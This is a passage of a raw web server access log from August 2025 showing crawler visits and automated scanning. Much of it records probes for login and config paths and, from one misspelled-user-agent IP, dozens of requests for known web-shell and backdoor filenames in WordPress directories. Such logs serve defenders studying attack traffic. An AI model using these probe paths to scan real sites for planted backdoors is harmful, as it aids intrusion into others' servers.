-0400] "GET /Public/mobile/css/base.css HTTP/1.1" 301 257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:04:28:27 -0400] "GET /Template/Mobile/js/main.js HTTP/1.1" 301 257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 173.252.79.116 - - [12/Aug/2025:04:30:44 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.107.9 - - [12/Aug/2025:04:30:58 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 31.13.127.3 - - [12/Aug/2025:04:31:22 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.107.3 - - [12/Aug/2025:04:31:25 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 69.171.249.113 - - [12/Aug/2025:04:32:06 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 31.13.103.7 - - [12/Aug/2025:04:32:18 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 69.171.249.9 - - [12/Aug/2025:04:32:44 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 31.13.103.4 - - [12/Aug/2025:04:32:52 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 69.63.189.43 - - [12/Aug/2025:04:34:05 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 31.13.103.113 - - [12/Aug/2025:04:34:26 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 216.73.216.186 - - [12/Aug/2025:04:38:50 -0400] "GET /.well-known/pki-validation HTTP/1.1" 301 257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 206.189.247.132 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:04:42:57 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:04:42:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:04:42:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:04:42:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 216.73.216.186 - - [12/Aug/2025:04:45:18 -0400] "GET /robots.txt HTTP/1.1" 301 246 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:04:45:26 -0400] "GET / HTTP/1.1" 301 236 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 62.141.44.236 - - [12/Aug/2025:04:45:49 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54" 146.190.11.185 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 149.102.237.41 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 143.198.200.162 - - [12/Aug/2025:05:04:18 -0400] "POST /admin_panel/index.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36" 216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/DS5FXTO985UJI7Q_A1JZP4N_3N1Y_AHQ HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /bc HTTP/1.1" 301 233 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/9B4MBPSB0VQD2_-RB10_QVLALIYTI9AC HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/ZXUU1PNOGK_IDBI6JJZ544F11XYJ0TM0 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/PMIFKZL0OYA3GLIOFHS_SM8LD79P_FBG HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 206.189.247.132 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:05:11:03 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:05:11:04 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:05:11:04 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:05:11:04 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 216.73.216.186 - - [12/Aug/2025:05:17:11 -0400] "GET /.well-known/acme-challenge/EW8BKKPN8TJ84EZUUUCDEQJBO3IHU7Z- HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:05:17:16 -0400] "GET /.well-known/acme-challenge/VMFNR1P41B2T4EW-YK7E12EL-8HAMSG0 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:05:17:22 -0400] "GET /.well-known/acme-challenge/_2EYKAKAZQBERDCRLUPNBY41L8B4N32Z HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 4.43.184.114 - - [12/Aug/2025:05:19:03 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16" 128.199.106.124 - - [12/Aug/2025:05:22:43 -0400] "GET /xmrlpc.php7 HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:43 -0400] "GET /lock360.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:43 -0400] "GET /Mshell.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:44 -0400] "GET /wp-include/xmrlpc.php7 HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:44 -0400] "GET /.wp-themes.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:44 -0400] "GET /.wp-themes.php7 HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:45 -0400] "GET /edit-comments.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:45 -0400] "GET /ern1.PhP7 HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:45 -0400] "GET /heex.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:46 -0400] "GET /inputs.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:46 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:47 -0400] "GET /cgi-bin/install.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:47 -0400] "GET /alfanew.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:47 -0400] "GET /.well-known/pkivalidation/bala.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:48 -0400] "GET /ova-tools.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:48 -0400] "GET /wp-content/plugins/wp-daft/t62.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:48 -0400] "GET /wp-content/themes/hello-element/footer.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:49 -0400] "GET /wp-content/plugins/wordpress-three/miin.php HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:49 -0400] "GET /filefuns.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:49 -0400] "GET /qinfofuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:50 -0400] "GET /tempfuns.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:50 -0400] "GET /comdofuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:50 -0400] "GET /userfuns.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:51 -0400] "GET /hinfofuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:51 -0400] "GET /onclickfuns.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:52 -0400] "GET /chtmlfuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:52 -0400] "GET /bugz.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:52 -0400] "GET /makeasmtp.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:53 -0400] "GET /wp-mini.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:53 -0400] "GET /wp-includes/sitemaps/providers/mariju.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:53 -0400] "GET /wp-admin/css/colors/coffee/mariju.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:54 -0400] "GET /cgi-bin/mariju.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:54 -0400] "GET 